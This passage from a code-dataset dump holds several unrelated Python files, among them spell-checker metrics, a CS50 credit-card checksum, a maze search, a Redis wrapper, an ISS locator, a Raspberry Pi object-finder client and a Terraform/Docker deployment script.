wrong_texts\n\n\ndef get_metrics(function_name, id_test, function, original_tokens, errors_text):\n \"Calculates metrics.\"\n errors_tokens = regex.findall(r'\\w+|\\s+|\\p{P}+', errors_text, flags=regex.UNICODE)\n\n # Corrigir erros do texto\n print(f'-- Correção dos erros do texto com função {function_name} - Teste {str(id_test)} --',\n file=sys.stderr)\n if function_name == 'Manual':\n time1 = time.time()\n pos_freq, words_freq = spellcorrector.analyze_large_text()\n time2 = time.time()\n corrected_text = spellcorrector.correct_text(pos_freq, words_freq,\n text_lines=errors_text.split('\\n'))\n time3 = time.time()\n duration = (time2-time1, time3-time2)\n else:\n time1 = time.time()\n corrected_text = spellcorrector.correct_text_ext(errors_text.split('\\n'), function)\n time2 = time.time()\n duration = time2-time1\n\n corrected_tokens = regex.findall(r'\\w+|\\s+|\\p{P}+', corrected_text, flags=regex.UNICODE)\n with open('metrics_corrected.txt', 'a+') as file_desc:\n print(f'\\n-- FUNÇÃO {function_name} - TESTE {id_test} --', file=file_desc)\n print(corrected_text, file=file_desc)\n\n # Calcular métricas\n print('-- Cálculo de métricas --', file=sys.stderr)\n true_positives_wrong_correction = 0 # Há erro e token é corrigido incorretamente\n true_positives_right_correction = 0 # Há erro e token é corrigido corretamente\n true_negatives = 0 # Não há erro e token mantém-se\n false_positives = 0 # Não há erro, mas token é corrigido\n false_negatives = 0 # Há erro, mas este não é corrigido\n total_words = 0\n\n for i, token in enumerate(original_tokens):\n if is_word(token) or is_word(errors_tokens[i]) or is_word(corrected_tokens[i]):\n total_words += 1\n classif = classification(token, errors_tokens[i], corrected_tokens[i])\n # True Positives, Correção errada\n if classif == 'TPW':\n true_positives_wrong_correction += 1\n # True Positives, Correção correta\n elif classif == 'TPR':\n true_positives_right_correction += 1\n # True Negatives\n elif classif == 'TN':\n true_negatives += 1\n # False Positives\n elif classif == 'FP':\n false_positives += 1\n # False Negatives\n elif classif == 'FN':\n false_negatives += 1\n\n return true_positives_wrong_correction, true_positives_right_correction, true_negatives, \\\n false_positives, false_negatives, total_words, duration\n\n\ndef run_tests(function_name, function, original_tokens, wrong_texts, n_tests):\n \"Run tests.\"\n true_positives_wrong_correction = 0 # Há erro e token é corrigido incorretamente\n true_positives_right_correction = 0 # Há erro e token é corrigido corretamente\n true_negatives = 0 # Não há erro e token mantém-se\n false_positives = 0 # Não há erro, mas token é corrigido\n false_negatives = 0 # Há erro, mas este não é corrigido\n total_words = 0\n duration = 0\n\n for i in range(0, n_tests):\n m_tpw, m_tpr, m_tn, m_fp, m_fn, m_tw, m_d = get_metrics(function_name, i, function,\n original_tokens, wrong_texts[i])\n true_positives_wrong_correction += m_tpw\n true_positives_right_correction += m_tpr\n true_negatives += m_tn\n false_positives += m_fp\n false_negatives += m_fn\n total_words += m_tw\n if isinstance(m_d, tuple):\n if i == 0:\n duration = [m_d[0], m_d[1]]\n else:\n duration[0] += m_d[0]\n duration[1] += m_d[1]\n else:\n duration += m_d\n\n true_positives_wrong_correction /= n_tests\n true_positives_right_correction /= n_tests\n true_negatives /= n_tests\n false_positives /= n_tests\n false_negatives /= n_tests\n total_words /= n_tests\n if isinstance(duration, list):\n duration[0] /= n_tests\n duration[1] /= n_tests\n else:\n duration /= n_tests\n\n true_positives = true_positives_right_correction + true_positives_wrong_correction\n\n if total_words > 0:\n accuracy = round((true_positives_right_correction + true_negatives) / total_words, 2)\n\n if true_positives + false_positives > 0:\n precision = round(true_positives_right_correction / (true_positives + false_positives),\n 2)\n else:\n precision = None\n\n if true_positives + false_negatives > 0:\n recall = round(true_positives_right_correction / (true_positives + false_negatives), 2)\n else:\n recall = None\n\n if precision and recall and precision + recall > 0:\n harmonic_mean = round(2 * ((precision * recall) / (precision + recall)), 2)\n else:\n harmonic_mean = None\n\n if true_positives + false_negatives > 0:\n true_positive_rate = round(true_positives_right_correction /\n (true_positives + false_negatives), 2)\n else:\n true_positive_rate = None\n\n if false_positives + true_negatives > 0:\n false_positive_rate = round(false_positives / (false_positives + true_negatives), 2)\n else:\n false_positive_rate = None\n else:\n accuracy = None\n precision = None\n recall = None\n harmonic_mean = None\n true_positive_rate = None\n false_positive_rate = None\n\n return true_positives_wrong_correction, true_positives_right_correction, true_negatives,\\\n false_positives, false_negatives, accuracy, precision, recall, harmonic_mean,\\\n true_positive_rate, false_positive_rate, duration\n\n\ndef main():\n \"Main function.\"\n # Ler texto correto\n print('-- Leitura do texto correto --', file=sys.stderr)\n original_text = ''.join([line for line in fileinput.input(sys.argv[1:])])\n original_tokens = regex.findall(r'\\w+|\\s+|\\p{P}+', original_text, flags=regex.UNICODE)\n\n print('-- Inserção de erros no texto original (5x) --', file=sys.stderr)\n wrong_texts = get_wrong_texts(5, original_tokens)\n\n # Gerar estrutura da tabela output\n table = PrettyTable()\n table.field_names = [\"Medidas\", \"Manual\", \"Aspell\", \"Hunspell\", \"Symspell\"]\n tpw_list = ['True Positives Wrong']\n tpr_list = ['True Positives Right']\n tn_list = ['True Negatives']\n fp_list = ['False Positives']\n fn_list = ['False Negatives']\n accuracy_list = ['Accuracy']\n precision_list = ['Precision']\n recall_list = ['Recall']\n hm_list = ['Harmonic Mean']\n tp_rate_list = ['TP Rate']\n fp_rate_list = ['FP Rate']\n d_list = ['Duration (sec)']\n\n m_tpw, m_tpr, m_tn, m_fp, m_fn, accuracy, precision, recall, h_mean, tp_rate, fp_rate, dur = \\\n run_tests('Manual', spellcorrector.correct_text, original_tokens, wrong_texts, 5)\n tpw_list.append(m_tpw)\n tpr_list.append(m_tpr)\n tn_list.append(m_tn)\n fp_list.append(m_fp)\n fn_list.append(m_fn)\n accuracy_list.append(accuracy)\n precision_list.append(precision)\n recall_list.append(recall)\n hm_list.append(h_mean)\n tp_rate_list.append(tp_rate)\n fp_rate_list.append(fp_rate)\n d_list.append(f'{round(dur[0],2)} + {round(dur[1],2)}')\n\n function_names = [\"Aspell\", \"Hunspell\", \"Symspell\"]\n functions = [spellcorrector.correct_line_aspell, spellcorrector.correct_line_hunspell,\n spellcorrector.correct_line_symspell]\n for i in range(0, 3):\n m_tpw, m_tpr, m_tn, m_fp, m_fn, accuracy, precision, recall, h_mean, tp_rate, fp_rate, \\\n dur = run_tests(function_names[i], functions[i], original_tokens, wrong_texts, 5)\n tpw_list.append(m_tpw)\n tpr_list.append(m_tpr)\n tn_list.append(m_tn)\n fp_list.append(m_fp)\n fn_list.append(m_fn)\n accuracy_list.append(accuracy)\n precision_list.append(precision)\n recall_list.append(recall)\n hm_list.append(h_mean)\n tp_rate_list.append(tp_rate)\n fp_rate_list.append(fp_rate)\n d_list.append(str(round(dur, 2)))\n\n table.add_row(tpw_list)\n table.add_row(tpr_list)\n table.add_row(tn_list)\n table.add_row(fp_list)\n table.add_row(fn_list)\n table.add_row(accuracy_list)\n table.add_row(precision_list)\n table.add_row(recall_list)\n table.add_row(hm_list)\n table.add_row(tp_rate_list)\n table.add_row(fp_rate_list)\n table.add_row(d_list)\n\n print(table)\n\n\nif __name__ == \"__main__\":\n main()\n\n__author__ = \"João Barreira, Mafalda Nunes\"\n__email__ = \"a73831@alunos.uminho.pt, a77364@alunos.uminho.pt\"\n","repo_name":"barreira/spln-1819","sub_path":"tp3/scripts/metrics_measure.py","file_name":"metrics_measure.py","file_ext":"py","file_size_in_byte":12532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"6503734849","text":"import cs50\n\ndef checksum (c):\n card_length = 0\n first_two = 0\n \n ##other = even numbers, not odd ones!\n other_sum = 0\n nonother_sum = 0\n while c > 0: \n card_length+=1\n if card_length % 2 == 0 :\n if (c % 10 * 2) >= 10:\n other_sum += (c%10 * 2) + 1\n else:\n other_sum += (c%10 * 2)\n else:\n nonother_sum += (c%10)\n c=c//10 ##unlike in c, normal division would not round integer, since it would produce a float\n if c < 100 and c >=10:\n first_two = c\n \n if ((card_length != 13 and card_length is not 15 and card_length is not 16) or (((other_sum + nonother_sum) % 10) is not 0)):\n print(\"INVALID\\n\")\n \n else:\n if card_length == 15 or (first_two == 34 and first_two == 37):\n print (\"AMEX\\n\")\n elif (card_length == 16 and (51 <= first_two and first_two <= 55)):\n print (\"MASTERCARD\\n\")\n elif (card_length == 13 or card_length == 16) and (39 < first_two and first_two < 50):\n print (\"VISA\\n\")\n \ndef main():\n print (\"Input credit card number here: \", end=\"\")\n card_num = cs50.get_int() ##to take care of the possibility of user inputting a non-integer input\n checksum(card_num)\n \nif __name__ == '__main__':\n main()","repo_name":"NickSadjoli/cs50","sub_path":"pset6/credit.py","file_name":"credit.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"31783682321","text":"__author__ = \"Cody Swain\"\n\nimport time\nimport math\n\n## TO DO ##\n# This algorithm is inefficient because it passes the whole array with each recursive pass.\n# Memory usage can be reduced simply using the indices with a while loop. \n\ndef binary_search_1d(arr):\n\t'''Binary search peak finding for a one dimensional array\n\tParameters\n\t----------\n\tarr : list\n\t\tList of numerical values with a peak.\n\t'''\n\n\t# Iteration metadata\n\tprint(\"Length: {len} \\t Array: {arr}\".format(arr=arr, len=len(arr)))\n\n\t# Algorithm Implementation\n\tn = len(arr)\n\tif n%2 == 0:\n\t\tmid_idx = int(n/2-1)\n\telse: \n\t\tmid_idx = int((n-1)/2)\n\tif arr[mid_idx] < arr[mid_idx-1]:\n\t\treturn binary_search(arr[:mid_idx])\n\telif arr[mid_idx] < arr[mid_idx+1]:\n\t\treturn binary_search(arr[mid_idx:])\n\telse: \n\t\tpeak = arr[mid_idx]\n\t\treturn peak\n\nif __name__ == \"__main__\":\n\t# Test Array\n\tarray = [1, 3, 5, 7, 9, 11, 13, 15, 17, 18, 16, 14, 12, 10, 9, 8, 7, 6, 5, 4, 3, 2, 1]\n\t\n\t# Run binary search, and track runtime.\n\tprint(\"\\n\\nBinary search peak finding algorithm. \\n\")\n\tstart_time = time.time()\n\tpeak = binary_search(array)\n\tend_time = time.time()\n\tprint(\"\\nPeak found: {}\".format(peak))\n\tprint(\"Execution time: {}s\\n\\n\".format(end_time-start_time))","repo_name":"codyswain/Algorithms","sub_path":"binary_search_peak_finding.py","file_name":"binary_search_peak_finding.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"16664513025","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom typing import Any\n\nfrom redis import AuthenticationError, Redis\n\nfrom httpfpt.common.log import log\nfrom httpfpt.core import get_conf\n\n\nclass RedisDB(Redis):\n def __init__(self) -> None:\n super().__init__(\n host=get_conf.REDIS_HOST,\n port=get_conf.REDIS_PORT,\n password=get_conf.REDIS_PASSWORD,\n db=get_conf.REDIS_DATABASE,\n socket_timeout=get_conf.REDIS_TIMEOUT,\n decode_responses=True, # 转码 utf-8\n )\n self.prefix = 'httpfpt'\n\n def init(self) -> None:\n try:\n self.ping()\n except TimeoutError:\n log.error('数据库 redis 连接超时')\n except AuthenticationError:\n log.error('数据库 redis 授权认证错误')\n except Exception as e:\n log.error(f'数据库 redis 连接异常: {e}')\n else:\n log.info('数据库 redis 连接成功')\n\n def get(self, key: Any, logging: bool = True) -> Any:\n \"\"\"\n 获取 redis 数据\n\n :param key:\n :param logging:\n :return:\n \"\"\"\n data = super().get(key)\n if not data:\n if logging:\n log.warning(f'获取 redis 数据 {key} 失败, 此数据不存在')\n return data\n\n def get_prefix(self, prefix: str) -> list:\n \"\"\"\n 获取 redis 符合前缀的数据\n\n :param prefix: key 前缀\n :return:\n \"\"\"\n data = []\n for key in self.scan_iter(match=f'{prefix}*'):\n value = super().get(key)\n if value:\n data.append(value)\n return data\n\n def rset(self, key: Any, value: Any, **kwargs) -> None:\n \"\"\"\n 重置设置 redis 数据\n\n :param key:\n :param value:\n :param kwargs:\n :return:\n \"\"\"\n if super().exists(key):\n self.delete(key)\n self.set(key, value, **kwargs)\n\n def delete_prefix(self, prefix: str) -> None:\n \"\"\"\n 删除 redis 符合前缀的数据\n\n :param prefix: key 前缀\n :return:\n \"\"\"\n for key in self.scan_iter(match=f'{prefix}*'):\n self.delete(key)\n\n\nredis_client = RedisDB()\n","repo_name":"wu-clan/automated_api_pytest","sub_path":"httpfpt/db/redis_db.py","file_name":"redis_db.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"35"}
+{"seq_id":"4803918437","text":"from urllib.request import urlopen\nimport json\nfrom datetime import datetime\nfrom geopy.geocoders import Nominatim\n\niss_data = urlopen(\"http://api.open-notify.org/iss-now.json\") #Get data from API\n\niss_processed_data = json.loads(iss_data.read()) #Load data\n\ngeolocator = Nominatim(user_agent=\"Adam Khan's ISS Locator\") #Variable for calling Reverse Geocoding API\nlatAndLong = iss_processed_data['iss_position']['latitude'] + \", \" + iss_processed_data['iss_position']['longitude'] #Get Latitude and Longitude values for printing\nlatAndLong_no_space = iss_processed_data['iss_position']['latitude'] + \",\" + iss_processed_data['iss_position']['longitude'] #Latitude and Longitude for Google Maps link\n\nmaps_link = \"https://www.google.com/maps/search/?api=1&query=\" + latAndLong_no_space #Google Maps Link\ntry: #Try block works if there is an address (when ISS is over land)\n location = geolocator.reverse(latAndLong)\n print (\"The International Space Station is currently above: \", location.address)\n print (\"Latitude: \", iss_processed_data['iss_position']['latitude'])\n print (\"Longitude: \", iss_processed_data['iss_position']['longitude'])\n print (\"Check out the current location on Google Maps: \", maps_link)\nexcept: #Except block is called when address can not be found\n print (\"The International Space Station is currently over the ocean\")\n print (\"Latitude: \", iss_processed_data['iss_position']['latitude'])\n print (\"Longitude: \", iss_processed_data['iss_position']['longitude'])\n print (\"Check out the current location on Google Maps: \", maps_link)","repo_name":"notadamkhan/Python-ISS-Finder","sub_path":"ISSfinder.py","file_name":"ISSfinder.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"74870383780","text":"from heapq import heappop, heappush\nfrom typing import Dict, List, Tuple\n\n\ndef search(dct: Dict) -> List[Tuple[int, int]]:\n \"\"\"\n Solve the maze using uniform-cost search.\n\n Write your implementation below\n \"\"\"\n r, c = dct[\"rows\"], dct[\"cols\"]\n\n if not dct[\"goals\"]:\n return []\n\n x0, y0 = dct[\"start\"]\n map = [[0 for i in range(c)] for j in range(r)]\n\n # 0: walkable way 1: obstacles 3: goals\n for i, j in dct[\"goals\"]:\n map[i][j] = 3\n\n for i, j in dct[\"obstacles\"]:\n map[i][j] = 1\n\n # early goal check is used in the main loop\n # so start = goal case has to be checked here\n if map[x0][y0] == 3:\n return [(x0, y0)]\n\n # visited nodes stores their parent nodes in the map\n map[x0][y0] = None\n actions = [(1, 0), (0, 1), (-1, 0), (0, -1)]\n\n # heapq for frontier\n front = [(0, x0, y0)]\n\n def get_path(x: int, y: int) -> List[Tuple[int, int]]:\n path = [(x, y)]\n while map[x][y]:\n path.append(map[x][y])\n x, y = map[x][y]\n path.reverse()\n return path\n\n # when all actions have same cost, ucs is equivalent to bfs\n while front:\n co, cx, cy = heappop(front)\n for ax, ay in actions:\n x, y = cx + ax, cy + ay\n if x >= r or x < 0 or y >= c or y < 0:\n continue\n is_way = map[x][y] == 0\n is_goal = map[x][y] == 3\n if not is_way and not is_goal:\n continue\n map[x][y] = (cx, cy)\n if is_goal:\n return get_path(x, y)\n heappush(front, (co + 1, x, y))\n\n return []\n","repo_name":"IntrovertHedgehog/documents","sub_path":"study/computing/cs3243/Projects/Project 1/Code Templates/Pro1_1/A0219739N/ucs.py","file_name":"ucs.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"29850715597","text":"import sys\nfrom itertools import combinations\n\ninput = sys.stdin.readline\n\nwhile True: # break가 나올 때까지\n l = list(map(int, input().split()))\n if l[0] == 0: # 반복문 break조건\n break\n else:\n s = l[1:]\n for i in combinations(s, 6): # 주어진 수 중 6개를 뽑는 조합\n i = list(i)\n print(*i)\n print( )","repo_name":"msio900/coding_test","sub_path":"acmicpc/6603/6603.py","file_name":"6603.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"}
+{"seq_id":"26553692854","text":"#!/usr/bin/python\n##\n# Description: Implements 2d banana distribution\n##\nimport numpy as np\nfrom scipy.stats import multivariate_normal\nimport matplotlib.pyplot as plt\n\n\nclass Banana_2D(object):\n def __init__(self, mu1=0, mu2=0, sigma1=1, sigma2=1, rho=0.9, a=1.15, b=0.5):\n self.mu1 = mu1\n self.mu2 = mu2\n # cov params\n self.sigma1 = sigma1\n self.sigma2 = sigma2\n self.rho = rho\n # transform params\n self.a = a\n self.b = b\n # define gauss dist\n mean_vec = np.array([self.mu1, self.mu2])\n cov = np.array([[self.sigma1 ** 2.0, self.rho * (sigma1 * sigma2)], [self.rho * (sigma1 * sigma2), self.sigma2 ** 2.0]])\n self.rv_2d_normal = multivariate_normal(mean_vec, cov)\n\n def pdf(self, y1, y2):\n # transform coords\n x1_inv = y1 / self.a\n x2_inv = (y2 - self.b * (x1_inv ** 2.0 + self.a ** 2.0)) * self.a\n\n pos = np.dstack((x1_inv, x2_inv))\n # eval gauss pdf at tranformed coords\n return self.rv_2d_normal.pdf(pos)\n\n def ln_like(self, y):\n assert len(y) == 2\n return np.log(self.pdf(y[0], y[1]))\n\n def check_prob_lvl(self, y1, y2, pdf_lvl):\n return pdf_lvl < self.pdf(y1, y2)\n\n def transform(self, x1, x2):\n y1 = self.a * x1\n y2 = x2 / self.a + self.b * (x1 ** 2.0 + self.a ** 2.0)\n return y1, y2\n\n def inv_transform(self, y1, y2):\n x1_inv = y1 / self.a\n x2_inv = (y2 - self.b * (x1_inv ** 2.0 + self.a ** 2.0)) * self.a\n return x1_inv, x2_inv\n\n def rvs(self, n_samples):\n # sample from gauss\n samples = self.rv_2d_normal.rvs(size=n_samples)\n x1_sample, x2_sample = samples[:, 0], samples[:, 1]\n\n # move sample to transformed coords\n y1 = self.a * x1_sample\n y2 = x2_sample / self.a + self.b * (x1_sample ** 2.0 + self.a ** 2.0)\n return (y1, y2)\n\n def cdf(self, y1, y2):\n # invert transform coords\n x1_inv = y1 / self.a\n x2_inv = (y2 - self.b * (x1_inv ** 2.0 + self.a ** 2.0)) * self.a\n pos = np.dstack((x1_inv, x2_inv))\n\n # eval gauss cdf at inv transform coords\n return self.rv_2d_normal.cdf(pos)\n\n\nif __name__ == \"__main__\":\n banana = Banana_2D()\n y1, y2 = banana.rvs(10000)\n plt.figure()\n plt.scatter(y1, y2, s=2, alpha=0.3)\n plt.grid(ls='--', alpha=0.5)\n plt.savefig(\"banana_plot_samples_ex.png\")\n plt.close()\n\n plt.figure()\n y1 = np.linspace(-4, 4, 100)\n y2 = np.linspace(-2, 8, 100)\n y1, y2 = np.meshgrid(y1, y2)\n p = banana.pdf(y1, y2)\n plt.contourf(y1, y2, p)\n plt.grid(ls='--', alpha=0.5)\n plt.savefig(\"banana_plot_pdf_ex.png\")\n plt.close()\n\n plt.figure()\n y1 = np.linspace(-4, 4, 100)\n y2 = np.linspace(-2, 8, 100)\n y1, y2 = np.meshgrid(y1, y2)\n c = banana.cdf(y1, y2)\n plt.contourf(y1, y2, c)\n plt.grid(ls='--', alpha=0.5)\n plt.savefig(\"banana_plot_cdf_ex.png\")\n plt.close()\n","repo_name":"wgurecky/bipymc","sub_path":"bipymc/utils/banana_rv.py","file_name":"banana_rv.py","file_ext":"py","file_size_in_byte":2969,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"35"}
+{"seq_id":"2116465783","text":"T = 10\n\ndef solve(num, cnt):\n global a, b, result\n if cnt == b:\n result = num\n return result\n solve(num * a, cnt + 1)\n\n\nfor cnt in range(1, T + 1):\n count = int(input())\n a, b = list(map(int, input().split()))\n solve(a, 1)\n print('#' + str(count) + ' ' + str(result))","repo_name":"Jungwoo-20/Algorithm","sub_path":"SWEA/1217.py","file_name":"1217.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"6962874688","text":"#!/usr/bin/python3\nfrom socketUtils import *\nfrom imutils.video import VideoStream\nfrom parrot import *\nimport argparse\nimport re\nimport time\nimport socket\nimport pickle\nimport uuid\nimport os\n\nCLASSES = {'telephone':1, 'mug':2, 'remote control':3, 'remote':3, 'bottle':4, 'hand':5}\nclass_id = \"class_id\"\nmask = \"mask\"\nroi = \"roi\"\nscore = \"score\"\n\nclass InferenceClient:\n def __init__(self, host, port):\n self.Host = host\n self.Port = port\n self.Server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.Server.connect((host, port))\n\n def GetDetections(self, img_id, frame):\n data = EvaluationData(img_id, frame)\n\n pkg = pickle.dumps(data)\n send_msg(self.Server, pkg)\n\n data = recv_msg(self.Server)\n resp = pickle.loads(data)\n return resp\n\n def Close(self):\n self.Server.close()\n\ndef ip_with_port(arg):\n if re.match(r'\\d{1,3}[.]\\d{1,3}[.]\\d{1,3}[.]\\d{1,3}[:]\\d+', arg):\n return arg\n raise argparse.ArgumentTypeError('Server address must be follow the format \\'0.0.0.0:\\'')\n\ndef play_ready():\n os.system('aplay -q ready.wav')\n\ndef play_error():\n os.system('aplay -q error.wav')\n\ndef get_detection_centre(detection):\n return ( ((detection[roi][3] - detection[roi][1]) / 2) + detection[roi][1], ((detection[roi][2] - detection[roi][0]) / 2) + detection[roi][0] )\n\ndef get_detection_area(detection):\n return (detection[roi][3] - detection[roi][1]) * (detection[roi][2] - detection[roi][0])\n\n# construct the argument parse and parse the arguments\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-s\", \"--server\", required=True, type=ip_with_port, help=\"IP and port of the server being used for detection. Required format - 0.0.0.0:\")\nparser.add_argument(\"-P\", \"--picamera\", action=\"store_true\", help=\"Whether or not the Raspberry Pi camera should be used\")\n\nargs = parser.parse_args()\n\nhost, port = args.server.split(':')\nport = int(port)\nclient = InferenceClient(host, port)\n\n# initialize the video stream and allow the cammera sensor to warmup\nvs = VideoStream(usePiCamera=args.picamera).start()\ntime.sleep(2.0)\n\n###\nlis = Listener()\nspkr = Speaker()\n\nspkr.Queue(\"Hello human\")\nspkr.Say(\"Give me a moment to get organized\")\n\npattern = r\"(?P(where)|(find))\\s*(is)?\\s*(the)?\\s*(?P\\w+)\"\n\ntry:\n lis.GetMicrophone('USB2.0')\nexcept MicrophoneException as e:\n print(str(e))\n spkr.Say(str(e))\n exit(1)\n\nspkr.Say(\"Ok, I'm ready\")\nwhile True:\n lis.ListenForKeyword(['raspberry'])\n play_ready()\n\n grammar_file = 'pi_commands.fsg'\n text = lis.ListenForCommand(grammar_file)\n if not text:\n spkr.Say(\"Sorry, I didn't understand\")\n continue\n\n print(text)\n match = re.match(pattern, text)\n if not match:\n play_error()\n continue\n\n thing = match.group('thing')\n print(thing)\n spkr.Say(\"You are looking for the %s\" % thing)\n\n targetClass = CLASSES[thing]\n # Guidance loop\n while True: # TODO: stop when found\n # Get frame and run it through inferece\n frame = vs.read()\n frame_size = frame.shape\n img_id = uuid.uuid4()\n detections = client.GetDetections(img_id, frame)\n\n # Get best/closer detections when multiple instances\n isHand = False\n centre = [x/2 for x in frame_size]\n print(centre)\n\n lastArea = 0\n target = []\n for detection in detections:\n if detection[class_id] == targetClass:\n area = get_detection_area(detection)\n if area > lastArea:\n lastArea = area\n target = detection\n elif detection[class_id] == CLASSES[\"hand\"]:\n centre = get_detection_centre(detection)\n isHand = True\n\n # If object not in sight, play error\n if not target:\n play_error()\n time.sleep(0.1)\n continue\n\n # Get target vector\n vector_hor = target(0) - centre(0)\n vector_ver = target(1) - centre(1)\n\n horizontal_tolerance = frame_size(0)/3\n vertical_tolerance = frame_size(1)/3\n\n # Queue up directions\n if vector_hor > horizontal_tolerance:\n spkr.Queue(\"Rigth\")\n elif vector_hor < -horizontal_tolerance:\n spkr.Queue(\"Left\")\n\n if vector_ver > vertical_tolerance:\n spkr.Queue(\"Down\")\n elif vector_ver < -vertical_tolerance:\n spkr.Queue(\"Up\")\n\n # Give directions\n spkr.Flush()\n time.sleep(0.1)","repo_name":"pchataignier/masters","sub_path":"raspberry_client.py","file_name":"raspberry_client.py","file_ext":"py","file_size_in_byte":4563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"14350308832","text":"def on_received_number(receivedNumber):\n if receivedNumber == 1:\n basic.pause(500)\n servos.P1.set_angle(0)\n basic.pause(500)\n servos.P1.stop()\n strip.show_color(neopixel.colors(NeoPixelColors.RED))\n basic.pause(500)\n elif receivedNumber == 2:\n servos.P1.set_angle(90)\n basic.pause(500)\n servos.P1.stop()\n strip.show_color(neopixel.colors(NeoPixelColors.BLACK))\nradio.on_received_number(on_received_number)\n\ndef on_button_pressed_a():\n radio.send_number(1)\n servos.P1.set_angle(90)\n basic.pause(500)\n servos.P1.stop()\n strip.show_color(neopixel.colors(NeoPixelColors.BLACK))\n OLED.clear()\n OLED.write_string_new_line(\"Lukka\")\n OLED.draw_line(0, 64, 128, 0)\n OLED.draw_line(128, 64, 0, 0)\ninput.on_button_pressed(Button.A, on_button_pressed_a)\n\ndef on_button_pressed_b():\n pass\ninput.on_button_pressed(Button.B, on_button_pressed_b)\n\nstrip: neopixel.Strip = None\nradio.set_group(1)\nled.enable(False)\nstrip = neopixel.create(DigitalPin.P2, 1, NeoPixelMode.RGB)\nOLED.init(128, 64)\n\ndef on_forever():\n if smarthome.read_noise(AnalogPin.P3) > 80:\n radio.send_number(2)\n servos.P1.set_angle(2)\n basic.pause(500)\n servos.P1.stop()\n strip.show_color(neopixel.colors(NeoPixelColors.RED))\n OLED.clear()\n OLED.write_string_new_line(\"Open\")\nbasic.forever(on_forever)\n","repo_name":"NewtonVoss/modul2","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"32705819727","text":"import pathlib\nimport docker\nimport argparse\nimport logging\nimport jmespath\nimport json\nimport boto3\nimport base64\nimport sys\n\n\nfrom python_terraform import *\n\nfrom typing import List\n\n# Log to file & stdout\nlogging.basicConfig(filename=\"nginx-system.log\", level=logging.INFO)\nlogging.getLogger().addHandler(logging.StreamHandler())\n\n# GLABOLs\nCWD: pathlib.Path = pathlib.Path().expanduser().resolve()\nDOCKER_PATH: pathlib.Path = CWD.joinpath('nginx-image')\nSERVICE_PATH: pathlib.Path = CWD.joinpath('service')\nDOCKER_CLIENT = docker.from_env()\n\n\ndef create_docker_images_and_push(profile: str, region: str, do_push: bool = False) -> None:\n \"\"\"\n Create images\n \"\"\"\n # Build the current Image\n logging.info(\"Building the Docker Container\")\n DOCKER_CLIENT.images.build(\n path=str(DOCKER_PATH),\n tag=\"nginx-container:latest\",\n quiet=False\n )\n\n # search for a tf state file\n terraform = [p for p in SERVICE_PATH.rglob(\"*.tfstate\")]\n\n if not terraform:\n logging.info(\"Can't get repo name form tfstate file\")\n sys.exit(1)\n\n # load tf state file\n with terraform[0].open(mode='r') as fp:\n tf_state_data = json.load(fp)\n\n # find the repository_url\n list_of_repository_url: List[str] = jmespath.search(\n \"resources[?type=='aws_ecr_repository'].instances | [0][*].attributes.repository_url\",\n tf_state_data\n )\n # check we we're able to get the repo\n if list_of_repository_url:\n repository_url: str = list_of_repository_url.pop(0)\n logging.info(f\"info: repo name is {repository_url}\")\n\n # 1) re-tag with epository_url\n current_image = DOCKER_CLIENT.images.get(\"nginx-container:latest\")\n current_image.tag(f\"{repository_url}:latest\")\n\n # 2) push image to aws\n if do_push:\n sesson = boto3.Session(profile_name=profile, region_name=region)\n ecr_client = sesson.client('ecr')\n\n token = ecr_client.get_authorization_token()\n\n registry_auth = token.get('authorizationData')\n # get auth token for ecr\n if registry_auth:\n try:\n username, password = base64.b64decode(registry_auth[0]['authorizationToken']).decode().split(':')\n repository_name = registry_auth[0]['proxyEndpoint']\n except IndexError as e:\n logging.error(f\"Error - {e}\")\n\n # loging and push the image\n DOCKER_CLIENT.login(username, password, registry=repository_name)\n DOCKER_CLIENT.images.push(f\"{repository_url}:latest\")\n\n\ndef create_terrafrom(profile: str, region: str) -> None:\n \"\"\"\n Create AWS structure from Terraform infrastructure\n :return: AWS Object\n \"\"\"\n logging.info(\"Creating Terraform layout (may take a while...)\")\n terraform = Terraform(working_dir=SERVICE_PATH)\n\n try:\n terraform.cmd(\"init\")\n except FileNotFoundError:\n logging.error(\"Terraform was not found in PATH. Please do so.\")\n sys.exit(1)\n\n terraform.cmd(f\"workspace new tstack\")\n terraform.cmd(f\"workspace select tstack\")\n return_code, _, stderr = terraform.cmd(\n \"apply\",\n vars=f\"profile={profile}\",\n auto_approve=IsFlagged\n )\n\n logging.info(f\"Terraform Exit Code: {return_code}\")\n\n if return_code == 0:\n logging.info(\"new stack created\")\n else:\n if \"ExpiredToken\" in stderr:\n logging.critical(\n \"***token expired, please renew and try again ***\"\n )\n else:\n logging.critical(\n \"*** Ensure aws profile exists***\"\n )\n sys.exit(1)\n\n print(terraform.output())\n\n\ndef clean_up(profile: str, region: str) -> None:\n \"\"\"\n remove everything created and docker images\n :param stack_id: Stack ID to delete\n \"\"\"\n try:\n terraform = Terraform(working_dir=SERVICE_PATH)\n terraform.cmd(\"init\")\n terraform.cmd(f\"workspace select tstack\")\n except (TerraformCommandError, KeyError):\n 